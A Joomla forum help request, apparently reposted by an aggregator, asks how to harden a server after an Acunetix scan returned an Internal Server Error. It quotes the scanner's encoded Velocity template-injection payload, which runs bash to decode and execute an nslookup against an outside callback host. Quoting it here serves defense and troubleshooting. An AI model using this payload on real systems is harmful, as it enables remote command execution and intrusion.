Quantcast
Channel: Joomla! Forum - community, help and support
Viewing all articles
Browse latest Browse all 1431

General Questions/New to Joomla! 5.x • Acunetix "Internal Server Error"

April 15, 2024, 4:32 pm
$
0
0
Our Information Security group runs Acunetix on all of our servers. On our Joomla 5.x server it reports an Internal Server Error when Acunetix tries the below URL on the server. Is there any way to harden Joomla 5.x to avoid this error condition occurring? (Server name removed from link for security.)

https://{server_name}/media/templates/site/cassiopeia/js/template.min.js?241464=%23set(%24engine%3d%22%22)%0a%23set(%24proc%3d%24engine.getClass().forName(%22java.lang.Runtime%22).getRuntime().exec(%22bash%20-c%20%7beval%2c%24(%7btr%2c%2f%2b%2c_-%7d%3c%3c%3cbnNsb29rdXAgZDVuYW9ndmF6a2V2LW9maG8xaXV6eXR6cGZteHplY3V1OWxta2xieDhqZy5yODcubWU%3d%7c%7bbase64%2c--decode%7d)%7d%22))%0a%23set(%24null%3d%24proc.waitFor())%0a%23set(%24istr%3d%24proc.getInputStream())%0a%23set(%24chr%3d%24engine.getClass().forName(%22java.lang.Character%22))%0a%23set(%24output%3d%22%22)%0a%23set(%24string%3d%24engine.getClass().forName(%22java.lang.String%22))%0a%23foreach(%24i%20in%20%5b1..%24istr.available()%5d)%0a%23set(%24output%3d%24output.concat(%24string.valueOf(%24chr.toChars(%24istr.read()))))%0a%23end%0a%24%7boutput%7d

Statistics: Posted by abernfr — Mon Apr 15, 2024 4:32 pm

Search
Viewing all articles
Browse latest Browse all 1431

Trending Articles

How to win at Markstrat (Markstrat Tips and Tricks) – Vodites

January 5, 2014, 10:34 pm

FIPS issues in Windows, .NET, and Visual Studio

January 26, 2017, 7:56 pm

Youth accused of having 17 forged $100 notes

June 6, 2015, 5:05 am

XLN Audio Addictive Drums 2 Complete v2.1.7 Incl Keygen HAPPY NEW YEAR-R2R

January 1, 2018, 10:15 am

Aberdeen woman in £15k benefit fraud

August 20, 2017, 11:00 pm

Exit Code 17006 when trying to update and Office 365 install with Project

July 10, 2017, 8:47 am

Words and Expressions Class 9 Solutions | NCERT Class 9 Words and Expressions...

August 17, 2022, 2:28 am

Error code CE-30095-7

October 23, 2017, 10:06 pm

Deployment configuration on indexers - DC:DeploymentClient -...

August 4, 2016, 9:04 pm

How to assign the custom BDXXX scripts to NPCs?

June 10, 2017, 3:24 pm

Oh Nadhaa - Umar zahir cover.

August 3, 2017, 5:18 am

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

Doctor winning fight to the death against cancer

January 3, 2013, 12:10 am

XXX esx.problem.hyperthreading.unmitigated.formatOnHost not found XXX (Build...

August 15, 2018, 2:17 am

Questions regarding Proxmox and Dell Power Edge VRTX

December 19, 2013, 10:10 am

(((IMPORTANT))): How to absorb high info content courses quickly

November 8, 2024, 2:56 am

Forum Post: RE: Pump Selecting

October 8, 2014, 7:12 am

UDP RSS performance issues with vmxnet3 on ESXi-6.7

September 13, 2019, 6:36 am

[Forums] Plugin development : Error: Cannot find module 'lodash'

November 26, 2019, 12:42 am

Manchester United Font 2021-2022

July 25, 2021, 2:03 am
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>